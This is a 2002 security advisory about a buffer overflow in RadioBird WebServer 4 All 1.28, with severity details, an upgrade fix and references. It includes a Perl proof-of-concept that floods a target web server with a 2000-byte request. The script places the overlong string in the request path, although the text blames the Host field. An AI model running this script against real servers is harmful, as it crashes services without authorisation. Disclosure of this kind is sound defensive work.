Radiobird Software WebServer 4 All Host Field Buffer Overflow

Published: 2002-10-29
Updated: 2002-10-29
Severity: High
Threat level: Ordinary user access privileges
Error type: Boundary check error
Exploitation mode: Server mode
BUGTRAQ ID: 6034

Affected systems
RadioBird Software WebServer 4 All 1.28

Detailed description
WebServer 4 All does not correctly check the data in the 'Host:' field of the HTTP headers. An attacker can submit an excessive amount of data and cause a buffer overflow in the system, which can lead to arbitrary code execution with the privileges of the web server.

Test code

    #!/usr/bin/perl -w
    use IO::Socket;

    # Target host and port are taken from the command line
    $host = $ARGV[0];
    $port = $ARGV[1];
    # 2000-byte filler string
    $evil = "A" x 2000;

    print "Web Server 4 Everyone v1.28 Host Field Denial of Service Vulnerability by SecurityOffice\n";
    print "Usage: $0 host port\n";
    print "Connecting...\n";
    $socket = IO::Socket::INET->
    new(Proto=>"tcp",
    PeerAddr=>$host,
    PeerPort=>$port)
    || die "Connection failed.\n";
    print "Attacking...\n";
    print $socket "GET /$evil HTTP/1.1\n Host: 127.0.0.1\n\n";
    close($socket);
    print "\nConnection closed. Finished.\n\n";

Solution
RadioBird Software WebServer 4 All 1.28:
RadioBird Software Upgrade WebServer 4 All 1.32
ftp://ftp.freeware.lt/anonymous/Soft/w4asetup.exe

Related information
Tamer Sahin <ts@securityoffice.net>.
Reference: http://online.securityfocus.com/archive/1/296759
Related homepage: http://www.freeware.lt/